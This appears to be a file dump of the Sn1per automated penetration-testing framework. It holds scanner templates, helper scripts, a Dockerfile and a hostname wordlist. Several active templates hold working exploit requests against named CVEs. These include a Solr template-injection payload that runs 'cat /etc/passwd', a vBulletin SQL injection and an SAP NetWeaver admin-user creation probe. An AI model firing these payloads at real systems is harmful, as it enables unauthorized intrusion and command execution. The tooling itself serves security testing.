3 | URI="/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1"
4 | METHOD='POST'
5 | MATCH="SESSID"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Content-Type: application/xml' -H 'X-NITRO-USER: xpyZxwy6' -H 'X-NITRO-PASS: xWXHUJ56' -I --data ''"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/network/Possible_Takeover_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Possible Takeover Detected'
3 | FILENAME="$LOOT_DIR/nmap/takeovers-$TARGET.txt"
4 | MATCH='anima|bitly|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp|azure|trafficmanager|netifly|brandpa'
5 | SEVERITY='P5 - INFO'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
9 | TYPE='network'
--------------------------------------------------------------------------------
/templates/active/CVE-2019-6340_-_Drupal8_REST_RCE_SA-CORE-2019-003.disabled:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-6340 - Drupal8 REST RCE SA-CORE-2019-003'
3 | URI='/node/1?_format=hal_json'
4 | METHOD='GET'
5 | MATCH='INVALID_VALUE\ does\ not\ correspond'
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS='--user-agent "" -s -L --insecure -H "Content-Type: application/hal+json" --data \'{ "_links": { "type": { "href": "http://192.168.56.101/drupal-8.6.9/rest/type/node/INVALID_VALUE" } }, "type": { "target_id": "article" }, "title": { "value": "My Article" }, "body": { "value": "some body content aaa bbb ccc" }}\' '
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/web/Clickjacking.sh:
--------------------------------------------------------------------------------
1 | if [ -f $LOOT_DIR/web/headers-http-$TARGET.txt ]; then
2 | if [ "$SSL" = "false" ]; then
3 | AUTHOR='@xer0dayz'
4 | VULN_NAME='Clickjacking HTTP'
5 | FILENAME="$LOOT_DIR/web/headers-http-$TARGET.txt"
6 | MATCH="x-frame-options"
7 | SEVERITY='P4 - LOW'
8 | GREP_OPTIONS='-i'
9 | SEARCH='negative'
10 | SECONDARY_COMMANDS=''
11 | URI=""
12 | else
13 | AUTHOR='@xer0dayz'
14 | VULN_NAME='Clickjacking HTTPS'
15 | FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt"
16 | MATCH="x-frame-options"
17 | SEVERITY='P4 - LOW'
18 | GREP_OPTIONS='-i'
19 | SEARCH='negative'
20 | SECONDARY_COMMANDS=''
21 | URI=""
22 | fi
23 | fi
--------------------------------------------------------------------------------
/templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_3.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 3'
3 | URI="/vb5/ajax/api/content_infraction/getIndexableContent"
4 | METHOD='POST'
5 | MATCH="vbulletinrce"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\" "
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/web/CSP_Not_Enforced.sh:
--------------------------------------------------------------------------------
1 | if [ -f $LOOT_DIR/web/headers-http-$TARGET.txt ]; then
2 | if [ "$SSL" = "true" ]; then
3 | AUTHOR='@xer0dayz'
4 | VULN_NAME='CSP Not Enforced'
5 | FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt"
6 | MATCH="content-security-policy"
7 | SEVERITY='P5 - INFO'
8 | GREP_OPTIONS='-i'
9 | SEARCH='negative'
10 | SECONDARY_COMMANDS=''
11 | URI=""
12 | else
13 | AUTHOR='@xer0dayz'
14 | VULN_NAME='CSP Not Enforced'
15 | FILENAME="$LOOT_DIR/web/headers-http-$TARGET.txt"
16 | MATCH="content-security-policy"
17 | SEVERITY='P5 - INFO'
18 | GREP_OPTIONS='-i'
19 | SEARCH='negative'
20 | SECONDARY_COMMANDS=''
21 | URI=""
22 | fi
23 | fi
--------------------------------------------------------------------------------
/templates/active/CVE-2020-9047_-_exacqVision_Web_Service_Remote_Code_Execution.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-9047 - exacqVision Web Service Remote Code Execution'
3 | URI="/version.web"
4 | METHOD='GET'
5 | MATCH="3\.10\.4\.72058|3\.12\.4\.76544|3\.8\.2\.67295|7\.0\.2\.81005|7\.2\.7\.86974|7\.4\.3\.89785|7\.6\.4\.94391|7\.8\.2\.97826|8\.0\.6\.105408|8\.2\.2\.107285|8\.4\.3\.111614|8\.6\.3\.116175|8\.8\.1\.118913|9\.0\.3\.124620|9\.2\.0\.127940|9\.4\.3\.137684|9\.6\.7\.145949|9\.8\.4\.149166|19\.03\.3\.152166|19\.06\.4\.157118|19\.09\.4\.0|19\.12\.2\.0|20\.03\.2\.0|20\.06\.3\.0"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/bin/slack.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # Slack API Integration script for Sn1per
3 | # By @xer0dayz - https://sn1persecurity.com
4 | #
5 |
6 | source /usr/share/sniper/sniper.conf 2> /dev/null
7 | source /root/.sniper.conf 2> /dev/null
8 | source /root/.sniper_api_keys.conf 2> /dev/null
9 |
10 | MESSAGE="$1"
11 |
12 | if [ "$MESSAGE" == "postfile" ]; then
13 | FILENAME="$2"
14 | curl -F "file=@$FILENAME" -F "initial_comment=$FILENAME" -F "channels=$SLACK_CHANNEL" -H "Authorization: Bearer $SLACK_API_TOKEN" https://slack.com/api/files.upload 2> /dev/null > /dev/null
15 | else
16 | curl -X POST -H 'Content-type: application/json' --data "{\"text\":\"$MESSAGE\"}" $SLACK_WEBHOOK_URL 2> /dev/null > /dev/null
17 | fi
18 |
--------------------------------------------------------------------------------
/templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-17558 - Apache Solr RCE'
3 | URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
4 | METHOD='GET'
5 | MATCH="root:*:"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/network/recursive/Component_With_Known_Vulnerabilities_-_NMap.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Component With Known Vulnerabilities - NMap'
3 | FILENAME="$LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET-*.txt"
4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
5 | MATCH="vulners.com"
6 | GREP_OPTIONS='-ih'
7 | TYPE="network"
8 |
9 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
10 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$5=AWK_TARGET{print "P3 - MEDIUM, Components with Known Vulnerabilities - NMap, " $5 ", " $2 " " $3 " " $4}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt
11 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Nikto_Vulnerability_Scan-HTTP.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Nikto Vulnerability Scan - HTTP'
3 | FILENAME="$LOOT_DIR/web/nikto-$TARGET-http-port80.txt"
4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
5 | MATCH="\+"
6 | GREP_OPTIONS='-ih'
7 |
8 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | grep -v "Target\ " | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nikto Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
10 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Nikto_Vulnerability_Scan-HTTPS.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Nikto Vulnerability Scan - HTTPS'
3 | FILENAME="$LOOT_DIR/web/nikto-$TARGET-https-port443.txt"
4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
5 | MATCH="\+"
6 | GREP_OPTIONS='-ih'
7 |
8 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | grep -v "Target\ " | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nikto Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
10 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
--------------------------------------------------------------------------------
/templates/active/CVE-2020-6287_-_Create_an_Administrative_User_in_SAP_NetWeaver_AS_JAVA.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-6287 - Create an Administrative User in SAP NetWeaver AS JAVA'
3 | URI="/CTCWebService/CTCWebServiceBean/ConfigServlet"
4 | METHOD='POST'
5 | MATCH="CTCWebServiceSi"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -L -s --insecure -H 'Content-Type: text/xml; charset=UTF-8' --data 'sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc{{base64('data')}}userDetails'"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/bin/waybackurls.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import json
4 |
5 |
6 | def waybackurls(host, with_subs):
7 | if with_subs:
8 | url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
9 | else:
10 | url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
11 | r = requests.get(url)
12 | results = r.json()
13 | return results[1:]
14 |
15 |
16 | if __name__ == '__main__':
17 | argc = len(sys.argv)
18 | if argc < 2:
19 | print('Usage:\n\tpython3 waybackurls.py ')
20 | sys.exit()
21 |
22 | host = sys.argv[1]
23 | with_subs = False
24 | if argc > 3:
25 | with_subs = True
26 |
27 | urls = waybackurls(host, with_subs)
28 | json_urls = json.dumps(urls)
29 | if urls:
30 | filename = '%s-waybackurls.json' % host
31 | with open(filename, 'w') as f:
32 | f.write(json_urls)
33 | print('[*] Saved results to %s' % filename)
34 | else:
35 | print('[-] Found nothing')
36 |
--------------------------------------------------------------------------------
/uninstall.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # Uninstall script for Sn1per
3 | # Created by @xer0dayz - https://sn1persecurity.com
4 |
5 | if [[ $EUID -ne 0 ]]; then
6 | echo "This script must be run as root"
7 | exit 1
8 | fi
9 |
10 | # VARS
11 | OKBLUE='\033[94m'
12 | OKRED='\033[91m'
13 | OKGREEN='\033[92m'
14 | OKORANGE='\033[93m'
15 | RESET='\e[0m'
16 |
17 | echo -e "$OKRED ____ $RESET"
18 | echo -e "$OKRED _________ / _/___ ___ _____$RESET"
19 | echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
20 | echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
21 | echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
22 | echo -e "$OKRED /_/ $RESET"
23 | echo -e "$RESET"
24 | echo -e "$OKORANGE + -- --=[https://sn1persecurity.com$RESET"
25 | echo ""
26 |
27 | INSTALL_DIR=/usr/share/sniper
28 |
29 | echo -e "$OKRED[>]$RESET This script will uninstall sniper and remove ALL files under $INSTALL_DIR. Are you sure you want to continue?$RESET"
30 | read answer
31 |
32 | rm -Rf /usr/share/sniper/
33 | rm -f /usr/bin/sniper
34 |
35 | echo -e "$OKBLUE[*]$RESET Done!$RESET"
--------------------------------------------------------------------------------
/modes/web.sh:
--------------------------------------------------------------------------------
1 | # WEB MODE #############################################################################################################
2 | if [[ "$MODE" = "web" ]]; then
3 | if [[ "$REPORT" = "1" ]]; then
4 | if [[ ! -z "$WORKSPACE" ]]; then
5 | args="$args -w $WORKSPACE"
6 | LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
7 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
8 | mkdir -p $LOOT_DIR 2> /dev/null
9 | mkdir $LOOT_DIR/domains 2> /dev/null
10 | mkdir $LOOT_DIR/screenshots 2> /dev/null
11 | mkdir $LOOT_DIR/nmap 2> /dev/null
12 | mkdir $LOOT_DIR/notes 2> /dev/null
13 | mkdir $LOOT_DIR/reports 2> /dev/null
14 | mkdir $LOOT_DIR/scans 2> /dev/null
15 | mkdir $LOOT_DIR/output 2> /dev/null
16 | fi
17 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
18 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
19 | sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
20 | exit
21 | fi
22 | fi
23 |
--------------------------------------------------------------------------------
/templates/passive/network/recursive/Interesting_Ports_Found.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Interesting Ports Found'
3 | FILENAME="$LOOT_DIR/nmap/ports-$TARGET.txt"
4 | MATCH="21\ |22\ |23\ |137\ |139\ |445\ |8080\ |8443\ |3306\ |5900\ |53\ |8081\ |5432\ "
5 | SEVERITY='P5 - INFO'
6 | GREP_OPTIONS='-i'
7 | SECONDARY_COMMANDS=''
8 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
9 | TYPE='network'
10 |
11 | rm -f /tmp/match.out 2> /dev/null
12 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null | head -n 1 2> /dev/null > /tmp/match.out
13 |
14 | CHARS="$(wc -c /tmp/match.out 2> /dev/null | awk '{print $1}' 2> /dev/null)"
15 | if [[ $CHARS > 0 ]]; then
16 | echo "$SEVERITY, $VULN_NAME, $TARGET, $(cat /tmp/match.out 2> /dev/null)" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
17 | # /bin/bash "$INSTALL_DIR/bin/slack.sh" "[+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(cat /tmp/match.out | tr '\n' ' ') (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
18 | #echo "•?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(cat /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
19 | else
20 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
21 | fi
22 |
23 | rm -f /tmp/match.out 2> /dev/null
24 |
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM docker.io/kalilinux/kali-rolling:latest
2 |
3 | LABEL org.label-schema.name='Sn1per - Kali Linux' \
4 | org.label-schema.description='Automated pentest framework for offensive security experts' \
5 | org.label-schema.usage='https://github.com/1N3/Sn1per' \
6 | org.label-schema.url='https://github.com/1N3/Sn1per' \
7 | org.label-schema.vendor='https://sn1persecurity.com' \
8 | org.label-schema.schema-version='1.0' \
9 | org.label-schema.docker.cmd.devel='docker run --rm -ti xer0dayz/sniper' \
10 | MAINTAINER="@xer0dayz"
11 |
12 | RUN echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list && \
13 | echo "deb-src http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
14 | ENV DEBIAN_FRONTEND noninteractive
15 |
16 | RUN set -x \
17 | && apt -yqq update \
18 | && apt -yqq full-upgrade \
19 | && apt clean
20 | RUN apt install --yes metasploit-framework
21 |
22 | RUN sed -i 's/systemctl status ${PG_SERVICE}/service ${PG_SERVICE} status/g' /usr/bin/msfdb && \
23 | service postgresql start && \
24 | msfdb reinit
25 |
26 | WORKDIR /usr/src/app
27 |
28 | RUN apt --yes install git bash
29 | RUN git clone https://github.com/1N3/Sn1per.git \
30 | && cd Sn1per \
31 | && ./install.sh \
32 | && sniper -u force
33 |
34 | CMD ["sniper"]
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Wordpress Vulnerability Scan - HTTP 1'
3 | FILENAME="$LOOT_DIR/web/wpscan-$TARGET-http-port80a.txt"
4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
5 | MATCH="Title\:"
6 | GREP_OPTIONS='-ih'
7 |
8 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
10 | MATCH="[+]"
11 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
12 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Wordpress Vulnerability Scan - HTTP 2'
3 | FILENAME="$LOOT_DIR/web/wpscan-$TARGET-http-port80b.txt"
4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
5 | MATCH="Title\:"
6 | GREP_OPTIONS='-ih'
7 |
8 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
10 | MATCH="[+]"
11 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
12 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Wordpress Vulnerability Scan - HTTPS 1'
3 | FILENAME="$LOOT_DIR/web/wpscan-$TARGET-https-port443a.txt"
4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
5 | MATCH="Title\:"
6 | GREP_OPTIONS='-ih'
7 |
8 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
10 | MATCH="[+]"
11 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
12 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Wordpress Vulnerability Scan - HTTPS 2'
3 | FILENAME="$LOOT_DIR/web/wpscan-$TARGET-https-port443b.txt"
4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
5 | MATCH="Title\:"
6 | GREP_OPTIONS='-ih'
7 |
8 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
10 | MATCH="[+]"
11 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
12 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
--------------------------------------------------------------------------------
/bin/waybackrobots.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re
3 | import sys
4 | from multiprocessing.dummy import Pool
5 |
6 |
7 | def robots(host):
8 | r = requests.get(
9 | 'https://web.archive.org/cdx/search/cdx\
10 | ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
11 | results = r.json()
12 | if len(results) == 0: # might find nothing
13 | return []
14 | results.pop(0) # The first item is ['timestamp', 'original']
15 | return results
16 |
17 |
18 | def getpaths(snapshot):
19 | url = 'https://web.archive.org/web/{0}/{1}'.format(snapshot[0], snapshot[1])
20 | robotstext = requests.get(url).text
21 | if 'Disallow:' in robotstext: # verify it's acually a robots.txt file, not 404 page
22 | paths = re.findall('/.*', robotstext)
23 | return paths
24 | return []
25 |
26 |
27 | if __name__ == '__main__':
28 | if len(sys.argv) < 2:
29 | print('Usage:\n\tpython3 waybackrobots.py ')
30 | sys.exit()
31 |
32 | host = sys.argv[1]
33 |
34 | snapshots = robots(host)
35 | print('Found %s unique results' % len(snapshots))
36 | if len(snapshots) == 0:
37 | sys.exit()
38 | print('This may take some time...')
39 | pool = Pool(4)
40 | paths = pool.map(getpaths, snapshots)
41 | unique_paths = set()
42 | for i in paths:
43 | unique_paths.update(i)
44 | filename = '%s-robots.txt' % host
45 | with open(filename, 'w') as f:
46 | f.write('\n'.join(unique_paths))
47 | print('[*] Saved results to %s' % filename)
48 |
--------------------------------------------------------------------------------
/wordlists/vhosts.txt:
--------------------------------------------------------------------------------
1 | 127.0.0.1
2 | admin
3 | administration
4 | ads
5 | adserver
6 | alerts
7 | alpha
8 | ap
9 | apache
10 | api
11 | app
12 | apps
13 | appserver
14 | aptest
15 | auth
16 | backup
17 | beta
18 | blog
19 | cdn
20 | chat
21 | citrix
22 | cms
23 | corp
24 | crs
25 | cvs
26 | dashboard
27 | database
28 | db
29 | demo
30 | dev
31 | devel
32 | development
33 | devsql
34 | devtest
